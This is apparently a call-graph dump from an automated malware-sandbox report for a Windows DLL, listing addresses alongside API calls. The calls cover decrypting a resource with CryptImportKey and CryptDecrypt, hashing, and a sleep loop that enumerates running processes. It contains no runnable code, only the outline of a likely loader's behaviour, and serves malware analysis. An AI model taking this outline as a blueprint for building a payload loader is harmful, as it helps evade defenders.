6c879101 108802->108803 108804 6c86b8d0 71 API calls 108803->108804 108805 6c87913d 108804->108805 108806 6c87bcf0 74 API calls 108805->108806 108807 6c879192 108805->108807 108806->108807 108807->108645 108809 6c85c15a 108808->108809 109246 6c85cfb0 108809->109246 108811 6c85c17a 108811->108647 108813 6c86b8d0 71 API calls 108812->108813 108814 6c879318 108813->108814 108816 6c87932b 108814->108816 109254 6c87bda0 108814->109254 108816->108649 109383 6c8661a0 108817->109383 108819 6c865abb 108819->108653 109389 6c86a180 108820->109389 108822 6c865da0 108822->108644 108824 6c86b326 108823->108824 108831 6c86b4c0 108824->108831 108828 6c86b3bc 108838 6c86a620 108828->108838 108830 6c86b3e9 108830->108796 108832 6c86b519 108831->108832 108844 6c86a820 108832->108844 108835 6c86a5d0 108933 6c86ac30 108835->108933 108837 6c86a5e4 108837->108828 108839 6c86a677 108838->108839 108840 6c86a66b std::ios_base::_Ios_base_dtor 108838->108840 108938 6c89c6aa 108839->108938 108840->108830 108842 6c86a690 108842->108840 108946 6c8699b0 70 API calls 2 library calls 108842->108946 108851 6c86a990 108844->108851 108848 6c86a85e 108849 6c86a8a5 108848->108849 108861 6c89c1f2 9 API calls 2 library calls 108848->108861 108849->108835 108852 6c86a9f6 108851->108852 108862 6c8803d7 108852->108862 108857 6c86aa20 108858 6c86aa67 108857->108858 108911 6c85bf70 108858->108911 108860 6c86aa7d std::ios_base::_Ios_base_dtor 108860->108848 108861->108849 108863 6c8803dc _Yarn 108862->108863 108864 6c86aa05 108863->108864 108866 6c8803f8 108863->108866 108876 6c9cf6bb EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 108863->108876 108873 6c86ab30 108864->108873 108867 6c89d2d8 Concurrency::details::ExternalContextBase::~ExternalContextBase 108866->108867 108868 6c880402 Concurrency::cancel_current_task 108866->108868 108878 6c9c21a1 RaiseException 108867->108878 108877 6c9c21a1 RaiseException 108868->108877 108871 6c89d2f4 108872 6c89c791 108879 6c89c58a 108873->108879 108875 6c86a842 108875->108857 108876->108863 108877->108872 108878->108871 108880 6c89c596 __EH_prolog3 108879->108880 108891 6c89c14e 108880->108891 108883 6c89c5d2 108897 6c89c17f 108883->108897 108885 6c89c5b4 108905 6c89c61d 46 API calls std::locale::_Setgloballocale 108885->108905 108887 6c89c60f Concurrency::details::ExternalContextBase::~ExternalContextBase 108887->108875 108889 6c89c5bc 108906 6c89c414 HeapFree GetLastError _Yarn ___std_type_info_destroy_list 108889->108906 108892 6c89c15d 108891->108892 108893 6c89c164 108891->108893 108907 6c9d249a 6 API calls std::_Lockit::_Lockit 108892->108907 108895 6c89c162 108893->108895 108908 6c8c8359 EnterCriticalSection 108893->108908 108895->108883 108904 6c89c493 5 API calls 2 library calls 108895->108904 108898 6c89c189 108897->108898 108899 6c9d24a8 108897->108899 108900 6c89c19c 108898->108900 108909 6c8c8367 LeaveCriticalSection 108898->108909 108910 6c9d2483 LeaveCriticalSection 108899->108910 108900->108887 108903 6c9d24af 108903->108887 108904->108885 108905->108889 108906->108883 108907->108895 108908->108895 108909->108900 108910->108903 108912 6c89c14e std::_Lockit::_Lockit 7 API calls 108911->108912 108913 6c85bfb2 108912->108913 108924 6c859c10 108913->108924 108915 6c85bfc7 108916 6c85c005 108915->108916 108930 6c85c790 71 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 108915->108930 108917 6c89c17f std::_Lockit::~_Lockit 2 API calls 108916->108917 108918 6c85c0ae 108917->108918 108918->108860 108920 6c85c022 108921 6c85c03b 108920->108921 108931 6c859ef0 RaiseException Concurrency::cancel_current_task 108920->108931 108932 6c89c32c RaiseException _Yarn Concurrency::cancel_current_task 108921->108932 108925 6c859c87 108924->108925 108926 6c859c2b 108924->108926 108925->108915 108927 6c89c14e std::_Lockit::_Lockit 7 API calls 108926->108927 108928 6c859c41 108927->108928 108929 6c89c17f std::_Lockit::~_Lockit 2 API calls 108928->108929 108929->108925 108930->108920 108932->108916 108934 6c8803d7 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 108933->108934 108935 6c86acb5 108934->108935 108936 6c86ab30 48 API calls 108935->108936 108937 6c86acbf 108936->108937 108937->108837 108939 6c89c6b3 108938->108939 108945 6c89c710 108939->108945 108947 6c9d0fe1 108939->108947 108941 6c89c707 108941->108945 108958 6c9d0c84 108941->108958 108943 6c89c722 108943->108945 108962 6c9d48b3 108943->108962 108945->108842 108946->108840 108948 6c9d0fec ___scrt_is_nonwritable_in_current_image 108947->108948 108949 6c9d101f 108948->108949 108950 6c9d0fff 108948->108950 108954 6c9d100f 108949->108954 108966 6c9df918 108949->108966 108980 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 108950->108980 108954->108941 108959 6c9d0c97 __snprintf_s 108958->108959 109044 6c9d0f37 108959->109044 108961 6c9d0cac __snprintf_s 108961->108943 108963 6c9d48c6 __snprintf_s 108962->108963 109106 6c9d4971 108963->109106 108965 6c9d48d2 __snprintf_s 108965->108945 108967 6c9df924 ___scrt_is_nonwritable_in_current_image 108966->108967 108982 6c9d246c EnterCriticalSection 108967->108982 108969 6c9df932 108983 6c9df9bc 108969->108983 108974 6c9dfce2 108975 6c9dfced 108974->108975 109003 6c9d0a33 108975->109003 108978 6c9d1063 108981 6c9d108c LeaveCriticalSection __fread_nolock 108978->108981 108980->108954 108981->108954 108982->108969 108987 6c9df9df 108983->108987 108984 6c9dfa37 108999 6c9d92c7 HeapFree GetLastError __dosmaperr 108984->108999 108987->108984 108990 6c9df93f 108987->108990 108997 6c9c539a EnterCriticalSection 108987->108997 108998 6c9c53ae LeaveCriticalSection 108987->108998 108988 6c9dfa49 108988->108990 109000 6c9db577 6 API calls std::_Lockit::_Lockit 108988->109000 108994 6c9df978 108990->108994 108991 6c9dfa68 109001 6c9c539a EnterCriticalSection 108991->109001 109002 6c9d2483 LeaveCriticalSection 108994->109002 108996 6c9d103a 108996->108954 108996->108974 108997->108987 108998->108987 108999->108988 109000->108991 109001->108990 109002->108996 109004 6c9d0a52 109003->109004 109005 6c9d0a65 109004->109005 109007 6c9d0a7a 109004->109007 109019 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109005->109019 109014 6c9d0b9a 109007->109014 109020 6c9d2c6a 45 API calls ___crtDownlevelLCIDToLocaleName 109007->109020 109008 6c9d0a75 109008->108978 109016 6c9e8ba0 109008->109016 109011 6c9d0bea 109011->109014 109021 6c9d2c6a 45 API calls ___crtDownlevelLCIDToLocaleName 109011->109021 109013 6c9d0c08 109013->109014 109022 6c9d2c6a 45 API calls ___crtDownlevelLCIDToLocaleName 109013->109022 109014->109008 109023 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109014->109023 109024 6c9e8f58 109016->109024 109019->109008 109020->109011 109021->109013 109022->109014 109023->109008 109025 6c9e8f64 ___scrt_is_nonwritable_in_current_image 109024->109025 109026 6c9e8f6b 109025->109026 109027 6c9e8f96 109025->109027 109042 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109026->109042 109033 6c9e8bc0 109027->109033 109032 6c9e8bbb 109032->108978 109034 6c9d6218 __wsopen_s 45 API calls 109033->109034 109035 6c9e8be2 109034->109035 109036 6c9c4aa2 __wsopen_s 6 API calls 109035->109036 109037 6c9e8bef 109036->109037 109038 6c9e8c2e __wsopen_s 92 API calls 109037->109038 109039 6c9e8bf6 109037->109039 109038->109039 109040 6c9d92c7 ___free_lconv_mon HeapFree GetLastError 109039->109040 109041 6c9e8c28 109039->109041 109040->109041 109043 6c9e8fed LeaveCriticalSection __wsopen_s 109041->109043 109042->109032 109043->109032 109046 6c9d0f43 ___scrt_is_nonwritable_in_current_image 109044->109046 109045 6c9d0f49 109067 6c9d1f20 24 API calls 2 library calls 109045->109067 109046->109045 109048 6c9d0f8c 109046->109048 109055 6c9c539a EnterCriticalSection 109048->109055 109049 6c9d0f64 109049->108961 109051 6c9d0f98 109056 6c9d0e4b 109051->109056 109053 6c9d0fae 109068 6c9d0fd7 LeaveCriticalSection __fread_nolock 109053->109068 109055->109051 109057 6c9d0e5e 109056->109057 109058 6c9d0e71 109056->109058 109057->109053 109069 6c9d0d72 109058->109069 109060 6c9d0e94 109061 6c9d0f22 109060->109061 109062 6c9d0eaf 109060->109062 109082 6c9d55cb 29 API calls 3 library calls 109060->109082 109061->109053 109073 6c9d4ac9 109062->109073 109067->109049 109068->109049 109070 6c9d0ddb 109069->109070 109071 6c9d0d83 109069->109071 109070->109060 109071->109070 109083 6c9dfabe 26 API calls 2 library calls 109071->109083 109074 6c9d0ec2 109073->109074 109075 6c9d4ae2 109073->109075 109079 6c9dfafe 109074->109079 109075->109074 109084 6c9d0c5d 109075->109084 109077 6c9d4afe 109089 6c9e1b16 109077->109089 109100 6c9dfc5f 109079->109100 109081 6c9dfb17 109081->109061 109082->109062 109083->109070 109085 6c9d0c7e 109084->109085 109086 6c9d0c69 109084->109086 109085->109077 109087 6c9d1d77 ___crtDownlevelLCIDToLocaleName 24 API calls 109086->109087 109088 6c9d0c79 109087->109088 109088->109077 109090 6c9e1b22 ___scrt_is_nonwritable_in_current_image 109089->109090 109091 6c9e1b63 109090->109091 109093 6c9e1ba9 109090->109093 109099 6c9e1b2a 109090->109099 109092 6c9d1f20 ___crtDownlevelLCIDToLocaleName 24 API calls 109091->109092 109092->109099 109094 6c9d1491 __wsopen_s EnterCriticalSection 109093->109094 109095 6c9e1baf 109094->109095 109096 6c9e1bcd 109095->109096 109097 6c9e18fa __wsopen_s 67 API calls 109095->109097 109098 6c9e1c1f __wsopen_s LeaveCriticalSection 109096->109098 109097->109096 109098->109099 109099->109074 109101 6c9d10a3 __wsopen_s 24 API calls 109100->109101 109102 6c9dfc71 109101->109102 109103 6c9dfc8d SetFilePointerEx 109102->109103 109105 6c9dfc79 __wsopen_s 109102->109105 109104 6c9dfca5 GetLastError 109103->109104 109103->109105 109104->109105 109105->109081 109107 6c9d497d ___scrt_is_nonwritable_in_current_image 109106->109107 109108 6c9d49aa 109107->109108 109109 6c9d4987 109107->109109 109111 6c9d49a2 109108->109111 109117 6c9c539a EnterCriticalSection 109108->109117 109132 6c9d1f20 24 API calls 2 library calls 109109->109132 109111->108965 109113 6c9d49c8 109118 6c9d48e3 109113->109118 109115 6c9d49d5 109133 6c9d4a00 LeaveCriticalSection __fread_nolock 109115->109133 109117->109113 109119 6c9d48f0 109118->109119 109120 6c9d4913 109118->109120 109145 6c9d1f20 24 API calls 2 library calls 109119->109145 109122 6c9d4ac9 ___scrt_uninitialize_crt 69 API calls 109120->109122 109130 6c9d490b 109120->109130 109123 6c9d492b 109122->109123 109134 6c9ddbfc 109123->109134 109126 6c9d0c5d __fread_nolock 24 API calls 109127 6c9d493f 109126->109127 109138 6c9e1670 109127->109138 109130->109115 109132->109111 109133->109111 109135 6c9d4933 109134->109135 109136 6c9ddc13 109134->109136 109135->109126 109136->109135 109147 6c9d92c7 HeapFree GetLastError __dosmaperr 109136->109147 109139 6c9e1699 109138->109139 109144 6c9d4946 109138->109144 109140 6c9e16e8 109139->109140 109142 6c9e16c0 109139->109142 109156 6c9d1f20 24 API calls 2 library calls 109140->109156 109148 6c9e1713 109142->109148 109144->109130 109146 6c9d92c7 HeapFree GetLastError __dosmaperr 109144->109146 109145->109130 109146->109130 109147->109135 109149 6c9e171f ___scrt_is_nonwritable_in_current_image 109148->109149 109150 6c9d1491 __wsopen_s EnterCriticalSection 109149->109150 109151 6c9e172d 109150->109151 109152 6c9e15d0 __wsopen_s 27 API calls 109151->109152 109153 6c9e175e 109151->109153 109152->109153 109154 6c9e1798 LeaveCriticalSection 109153->109154 109155 6c9e1781 109154->109155 109155->109144 109156->109144 109158 6c86b920 109157->109158 109164 6c86bd50 109158->109164 109160 6c86b947 109160->108799 109168 6c8677a0 109161->109168 109162 6c87bd86 109162->108801 109166 6c86bd9b 109164->109166 109165 6c86bda3 std::ios_base::_Ios_base_dtor 109165->109160 109166->109165 109167 6c85bf70 71 API calls 109166->109167 109167->109165 109170 6c86782e 109168->109170 109175 6c8678dc 109170->109175 109176 6c867eb0 109170->109176 109173 6c86794c 109173->109175 109184 6c9d4ec0 109173->109184 109175->109162 109177 6c8678e9 109176->109177 109178 6c867ed1 109176->109178 109177->109173 109177->109175 109180 6c9d0cbe 109177->109180 109178->109177 109194 6c9d5bcd 73 API calls __snprintf_s 109178->109194 109181 6c9d0cd1 __snprintf_s 109180->109181 109182 6c9d0f37 72 API calls 109181->109182 109183 6c9d0ce6 __snprintf_s 109182->109183 109183->109173 109185 6c9d4ecb 109184->109185 109186 6c9d4ee0 109184->109186 109199 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109185->109199 109187 6c9d4efd 109186->109187 109188 6c9d4ee8 109186->109188 109195 6c9d5595 109187->109195 109200 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109188->109200 109190 6c9d4ef8 109190->109175 109192 6c9d4edb 109192->109175 109194->109177 109196 6c9d55a9 __snprintf_s 109195->109196 109201 6c9d5b3e 109196->109201 109198 6c9d55b5 __snprintf_s 109198->109190 109199->109192 109200->109190 109202 6c9d5b4a ___scrt_is_nonwritable_in_current_image 109201->109202 109203 6c9d5b74 109202->109203 109204 6c9d5b51 109202->109204 109212 6c9c539a EnterCriticalSection 109203->109212 109227 6c9d1f20 24 API calls 2 library calls 109204->109227 109207 6c9d5b82 109213 6c9d599d 109207->109213 109209 6c9d5b91 109228 6c9d5bc3 LeaveCriticalSection __fread_nolock 109209->109228 109211 6c9d5b6a 109211->109198 109212->109207 109214 6c9d59ac 109213->109214 109215 6c9d59d4 109213->109215 109232 6c9d1f20 24 API calls 2 library calls 109214->109232 109217 6c9d0c5d __fread_nolock 24 API calls 109215->109217 109219 6c9d59dd 109217->109219 109218 6c9d59c7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 109218->109209 109229 6c9dfb1c 109219->109229 109222 6c9d5a9e 109222->109218 109234 6c9d57d2 28 API calls 2 library calls 109222->109234 109223 6c9d5a87 109233 6c9d5627 29 API calls 4 library calls 109223->109233 109225 6c9d5a96 109225->109218 109227->109211 109228->109211 109235 6c9dfb3a 109229->109235 109232->109218 109233->109225 109234->109218 109237 6c9dfb46 ___scrt_is_nonwritable_in_current_image 109235->109237 109236 6c9d59fb 109236->109218 109236->109222 109236->109223 109237->109236 109238 6c9dfb89 109237->109238 109240 6c9dfbcf 109237->109240 109239 6c9d1f20 ___crtDownlevelLCIDToLocaleName 24 API calls 109238->109239 109239->109236 109241 6c9d1491 __wsopen_s EnterCriticalSection 109240->109241 109242 6c9dfbd5 109241->109242 109243 6c9dfbf6 109242->109243 109244 6c9dfc5f __fread_nolock 26 API calls 109242->109244 109245 6c9dfc57 LeaveCriticalSection 109243->109245 109244->109243 109245->109236 109247 6c85d00a 109246->109247 109249 6c85d01c 109247->109249 109252 6c857ea0 25 API calls 109247->109252 109251 6c85d05b 109249->109251 109253 6c858070 27 API calls 109249->109253 109251->108811 109253->109251 109257 6c866f40 109254->109257 109255 6c87be13 109255->108816 109260 6c866fd3 109257->109260 109261 6c866ff3 109257->109261 109258 6c867225 109258->109260 109263 6c9d524f 109258->109263 109259 6c9d524f __fread_nolock 41 API calls 109259->109261 109260->109255 109261->109258 109261->109259 109261->109260 109266 6c9d51b2 109263->109266 109268 6c9d51be ___scrt_is_nonwritable_in_current_image 109266->109268 109267 6c9d51f6 109267->109260 109268->109267 109269 6c9d5208 109268->109269 109272 6c9d51d1 std::bad_exception::bad_exception 109268->109272 109277 6c9c539a EnterCriticalSection 109269->109277 109271 6c9d5212 109278 6c9d526c 109271->109278 109287 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109272->109287 109277->109271 109279 6c9d5229 109278->109279 109281 6c9d527e std::bad_exception::bad_exception 109278->109281 109288 6c9d5247 LeaveCriticalSection __fread_nolock 109279->109288 109280 6c9d528b std::bad_exception::bad_exception 109308 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109280->109308 109281->109279 109281->109280 109285 6c9d0c5d __fread_nolock 24 API calls 109281->109285 109289 6c9e23c9 109281->109289 109309 6c9c9c96 24 API calls 3 library calls 109281->109309 109310 6c9e2992 109281->109310 109285->109281 109287->109267 109288->109267 109290 6c9e23d4 109289->109290 109291 6c9e23e1 109290->109291 109294 6c9e23f9 109290->109294 109358 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109291->109358 109293 6c9e2458 109295 6c9d0c5d __fread_nolock 24 API calls 109293->109295 109294->109293 109302 6c9e23f1 109294->109302 109359 6c9e3dc1 HeapFree GetLastError ___free_lconv_mon 109294->109359 109297 6c9e2471 109295->109297 109347 6c9e2879 109297->109347 109299 6c9e2479 109300 6c9d0c5d __fread_nolock 24 API calls 109299->109300 109299->109302 109301 6c9e24aa 109300->109301 109301->109302 109303 6c9d0c5d __fread_nolock 24 API calls 109301->109303 109302->109281 109304 6c9e24b8 109303->109304 109304->109302 109305 6c9d0c5d __fread_nolock 24 API calls 109304->109305 109306 6c9e24c6 109305->109306 109307 6c9d0c5d __fread_nolock 24 API calls 109306->109307 109307->109302 109308->109279 109309->109281 109311 6c9e29bc 109310->109311 109312 6c9e29a4 __dosmaperr 109310->109312 109311->109312 109314 6c9e2a3a 109311->109314 109315 6c9e2a0a __dosmaperr 109311->109315 109312->109281 109316 6c9e2a53 109314->109316 109317 6c9e2a8e 109314->109317 109319 6c9e2a60 __dosmaperr 109314->109319 109380 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109315->109380 109316->109319 109339 6c9e2a7c 109316->109339 109369 6c9d9301 109317->109369 109368 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109319->109368 109321 6c9e2a9f 109374 6c9d92c7 HeapFree GetLastError __dosmaperr 109321->109374 109322 6c9e2bda 109325 6c9e2c4e 109322->109325 109328 6c9e2bf3 GetConsoleMode 109322->109328 109327 6c9e2c52 ReadFile 109325->109327 109326 6c9e2aa8 109375 6c9d92c7 HeapFree GetLastError __dosmaperr 109326->109375 109330 6c9e2c6a 109327->109330 109331 6c9e2cc6 GetLastError 109327->109331 109328->109325 109332 6c9e2c04 109328->109332 109330->109331 109336 6c9e2c43 109330->109336 109344 6c9e2a77 __fread_nolock __dosmaperr 109331->109344 109332->109327 109334 6c9e2c0a ReadConsoleW 109332->109334 109333 6c9e2aaf 109333->109344 109376 6c9dfabe 26 API calls 2 library calls 109333->109376 109334->109336 109337 6c9e2c24 GetLastError 109334->109337 109340 6c9e2c8f 109336->109340 109341 6c9e2ca6 109336->109341 109336->109344 109337->109344 109363 6c9e656f 109339->109363 109378 6c9e2d9b 28 API calls 2 library calls 109340->109378 109343 6c9e2cbf 109341->109343 109341->109344 109379 6c9e303f 27 API calls __fread_nolock 109343->109379 109377 6c9d92c7 HeapFree GetLastError __dosmaperr 109344->109377 109346 6c9e2cc4 109346->109344 109348 6c9e2885 ___scrt_is_nonwritable_in_current_image 109347->109348 109349 6c9e2918 109348->109349 109350 6c9e288d __dosmaperr 109348->109350 109353 6c9e28bf __dosmaperr 109348->109353 109360 6c9d1491 EnterCriticalSection 109349->109360 109350->109299 109352 6c9e291e 109355 6c9e2992 __fread_nolock 37 API calls 109352->109355 109356 6c9e293d __dosmaperr 109352->109356 109361 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109353->109361 109355->109356 109362 6c9e298a LeaveCriticalSection __wsopen_s 109356->109362 109358->109302 109359->109293 109360->109352 109361->109350 109362->109350 109365 6c9e657c 109363->109365 109366 6c9e6589 109363->109366 109364 6c9e6595 109364->109322 109365->109322 109366->109364 109381 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109366->109381 109368->109344 109371 6c9d933d 109369->109371 109372 6c9d930f __fread_nolock 109369->109372 109370 6c9d932a RtlAllocateHeap 109370->109371 109370->109372 109371->109321 109372->109370 109372->109371 109382 6c9cf6bb EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 109372->109382 109374->109326 109375->109333 109376->109339 109377->109312 109378->109344 109379->109346 109380->109312 109381->109365 109382->109372 109384 6c8661c4 109383->109384 109385 6c866204 109383->109385 109386 6c867eb0 73 API calls 109384->109386 109385->108819 109387 6c8661da 109386->109387 109388 6c9d48b3 74 API calls 109387->109388 109388->109385 109392 6c865fc0 109389->109392 109391 6c86a1c4 109391->108822 109393 6c86600a 109392->109393 109394 6c8661a0 76 API calls 109393->109394 109395 6c86602e 109393->109395 109394->109395 109395->109391 109397 6c8595bc 109396->109397 109399 6c8595cc 109397->109399 109400 6c859040 24 API calls 109397->109400 109399->108657 109400->109399 109462 6c85fde0 109401->109462 109404 6c86130f CryptAcquireContextW 109406 6c861392 109404->109406 109407 6c86135b 109404->109407 109410 6c8613c5 CryptImportKey 109406->109410 109537 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109407->109537 109409 6c861374 109538 6c9c21a1 RaiseException 109409->109538 109411 6c86147b 109410->109411 109412 6c861429 109410->109412 109414 6c861483 CryptSetKeyParam 109411->109414 109539 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109412->109539 109417 6c8614b4 109414->109417 109418 6c86151a CryptSetKeyParam 109414->109418 109416 6c860080 24 API calls 109423 6c8617c2 109416->109423 109541 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109417->109541 109421 6c8615c1 109418->109421 109422 6c86155b 109418->109422 109419 6c86145d 109540 6c9c21a1 RaiseException 109419->109540 109420 6c861159 109430 6c861256 109420->109430 109536 6c860ed0 27 API calls 109420->109536 109545 6c861930 27 API calls 109421->109545 109543 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109422->109543 109423->108662 109427 6c8615ea 109434 6c8615fd CryptDecrypt 109427->109434 109429 6c8614fc 109542 6c9c21a1 RaiseException 109429->109542 109483 6c8600a0 109430->109483 109433 6c8615a3 109544 6c9c21a1 RaiseException 109433->109544 109436 6c8616af 109434->109436 109437 6c861642 109434->109437 109548 6c860e90 27 API calls 109436->109548 109546 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109437->109546 109440 6c86168a 109547 6c9c21a1 RaiseException 109440->109547 109442 6c86138d 109442->109416 109443 6c8616fa 109549 6c857a60 27 API calls 109443->109549 109445 6c86173b 109446 6c861762 109445->109446 109448 6c858670 24 API calls 109445->109448 109550 6c860080 109446->109550 109448->109446 109450 6c860080 24 API calls 109451 6c861775 109450->109451 109452 6c860080 24 API calls 109451->109452 109453 6c86177d 109452->109453 109454 6c860080 24 API calls 109453->109454 109459 6c85f796 109458->109459 109460 6c85f7a1 109458->109460 109459->108664 109461 6c859590 24 API calls 109460->109461 109461->109459 109553 6c859440 109462->109553 109464 6c85fe2a CryptStringToBinaryA 109465 6c85fe72 109464->109465 109466 6c85fe9b 109464->109466 109555 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109465->109555 109557 6c85ffe0 27 API calls 109466->109557 109468 6c85fe83 109556 6c9c21a1 RaiseException 109468->109556 109471 6c85febc 109472 6c85fed2 CryptStringToBinaryA 109471->109472 109473 6c85ff4e 109472->109473 109474 6c85ff19 109472->109474 109476 6c85ff64 109473->109476 109478 6c860080 24 API calls 109473->109478 109558 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109474->109558 109476->109420 109477 6c85ff2c 109559 6c9c21a1 RaiseException 109477->109559 109478->109476 109480 6c85ff49 109481 6c860080 24 API calls 109480->109481 109482 6c85ff8f 109481->109482 109482->109420 109484 6c8600ec 109483->109484 109485 6c8600f4 CryptAcquireContextW 109484->109485 109486 6c86013c 109485->109486 109534 6c860177 109485->109534 109560 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109486->109560 109488 6c860152 109561 6c9c21a1 RaiseException 109488->109561 109490 6c860172 109491 6c860080 24 API calls 109490->109491 109492 6c8608af 109491->109492 109492->109404 109493 6c8601ad CryptCreateHash 109494 6c8601e6 109493->109494 109493->109534 109562 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109494->109562 109496 6c860214 109563 6c9c21a1 RaiseException 109496->109563 109498 6c8606ed 109576 6c861010 27 API calls 109498->109576 109499 6c86025f CryptHashData 109501 6c860291 109499->109501 109499->109534 109564 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109501->109564 109504 6c8602d0 109565 6c9c21a1 RaiseException 109504->109565 109506 6c86078a 109577 6c861010 27 API calls 109506->109577 109507 6c860445 CryptHashData 109509 6c8604d7 CryptGetHashParam 109507->109509 109510 6c860477 109507->109510 109512 6c860529 109509->109512 109509->109534 109568 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109510->109568 109511 6c860858 109515 6c860080 24 API calls 109511->109515 109570 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109512->109570 109516 6c860868 109515->109516 109517 6c860080 24 API calls 109516->109517 109519 6c860870 109517->109519 109523 6c860080 24 API calls 109519->109523 109521 6c8604b9 109569 6c9c21a1 RaiseException 109521->109569 109522 6c8605ab CryptGetHashParam 109526 6c8605e5 109522->109526 109522->109534 109527 6c860878 109523->109527 109524 6c86056b 109571 6c9c21a1 RaiseException 109524->109571 109573 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109526->109573 109529 6c860080 24 API calls 109527->109529 109530 6c860880 109529->109530 109530->109404 109532 6c860627 109574 6c9c21a1 RaiseException 109532->109574 109534->109493 109534->109498 109534->109499 109534->109507 109534->109522 109566 6c860a60 27 API calls 109534->109566 109567 6c860c70 27 API calls 109534->109567 109572 6c860e90 27 API calls 109534->109572 109575 6c860ed0 27 API calls 109534->109575 109536->109430 109537->109409 109538->109442 109539->109419 109540->109442 109541->109429 109542->109442 109543->109433 109544->109442 109545->109427 109546->109440 109547->109442 109548->109443 109549->109445 109578 6c861ec0 109550->109578 109554 6c859457 109553->109554 109554->109464 109555->109468 109556->109466 109557->109471 109558->109477 109559->109480 109560->109488 109561->109490 109562->109496 109563->109490 109564->109504 109565->109490 109566->109534 109567->109534 109568->109521 109569->109490 109570->109524 109571->109490 109572->109534 109573->109532 109574->109490 109575->109534 109576->109506 109577->109511 109579 6c861ed5 109578->109579 109581 6c86008f 109579->109581 109582 6c861fa0 24 API calls 109579->109582 109581->109450 109582->109581 109617 6c858a40 109613->109617 109615 6c873b09 109615->108686 109616->108713 109618 6c858a69 109617->109618 109619 6c858b60 27 API calls 109618->109619 109620 6c858a7d 109619->109620 109620->109615 109621->108721 109623 6c857c26 109622->109623 109625 6c857c38 109623->109625 109628 6c857ea0 25 API calls 109623->109628 109627 6c857c7d 109625->109627 109629 6c858070 27 API calls 109625->109629 109627->108730 109629->109627 109631 6c87960a FindResourceW 109630->109631 109631->108743 109631->108744 109633 6c857b10 27 API calls 109632->109633 109634 6c878756 109633->109634 109635 6c857b10 27 API calls 109634->109635 109636 6c878775 109635->109636 109637 6c861100 40 API calls 109636->109637 109638 6c8787a8 109637->109638 109639 6c858670 24 API calls 109638->109639 109640 6c8787b8 109639->109640 109641 6c858670 24 API calls 109640->109641 109642 6c8787c3 109641->109642 109656 6c8789f0 73 API calls 109642->109656 109645 6c878836 109646 6c858670 24 API calls 109645->109646 109647 6c878922 109646->109647 109658 6c878c60 24 API calls 109647->109658 109648 6c878030 27 API calls 109650 6c8787ed 109648->109650 109650->109645 109650->109648 109654 6c858670 24 API calls 109650->109654 109655 6c85f760 24 API calls 109650->109655 109657 6c878b60 71 API calls 109650->109657 109651 6c87892a 109652 6c858670 24 API calls 109651->109652 109653 6c878935 109652->109653 109653->108744 109654->109650 109655->109650 109656->109650 109657->109650 109658->109651 109660 6c877e7e 109659->109660 109661 6c877e96 109660->109661 109662 6c877eaf 109660->109662 109663 6c857b10 27 API calls 109661->109663 109671 6c878030 27 API calls 109662->109671 109664 6c877ea7 109663->109664 109664->108751 109666->108768 109671->109664 109677 6c879bd8 109673->109677 109674 6c857b10 27 API calls 109674->109677 109676 6c858670 24 API calls 109676->109677 109677->109674 109677->109676 109678 6c879c27 109677->109678 109679 6c879c78 Sleep 109677->109679 109912 6c879760 CreateToolhelp32Snapshot 109677->109912 109680 6c857b10 27 API calls 109678->109680 109679->109677 109681 6c879c40 109680->109681 109924 6c8799c0 29 API calls 109681->109924 109683 6c879c56 109684 6c858670 24 API calls 109683->109684 109685 6c879c63 109684->109685 109687 6c872120 __wsopen_s 109686->109687 109688 6c857b10 27 API calls 109687->109688 109689 6c872159 109688->109689 109690 6c8720a0 28 API calls 109689->109690 109691 6c87216f _Yarn 109690->109691 109925 6c8737f0 109691->109925 109693 6c8721de _Yarn 109694 6c8737f0 27 API calls 109693->109694 109695 6c87225c 109694->109695 109929 6c871ca0 109695->109929 109913 6c8797b6 std::bad_exception::bad_exception 109912->109913 109914 6c8797bb 109912->109914 109915 6c8797e4 Process32FirstW 109913->109915 109914->109677 109916 6c87981d 109915->109916 109917 6c879939 CloseHandle 109915->109917 109918 6c879827 WideCharToMultiByte 109916->109918 109920 6c858670 24 API calls 109916->109920 109921 6c8798c8 CloseHandle 109916->109921 109922 6c8798f1 Process32NextW 109916->109922 109917->109914 109919 6c857b10 27 API calls 109918->109919 109919->109916 109920->109916 109921->109914 109922->109916 109923 6c87992f 109922->109923 109923->109917 109924->109683 109926 6c87385f 109925->109926 109997 6c876d40 109926->109997 109928 6c8738b1 109928->109693 109930 6c871ce6 109929->109930 110005 6c871dd0 109930->110005 109932 6c871d03 109998 6c876d86 109997->109998 110002 6c876e22 109998->110002 110003 6c861b80 27 API calls 109998->110003 110000 6c876dce 110004 6c861c50 24 API calls 110000->110004 110002->109928 110003->110000 110004->110002 110006 6c871df4 110005->110006 110007 6c871df9 110005->110007 110006->109932 110007->110006 110008 6c871e38 110007->110008 110010 6c871e6f 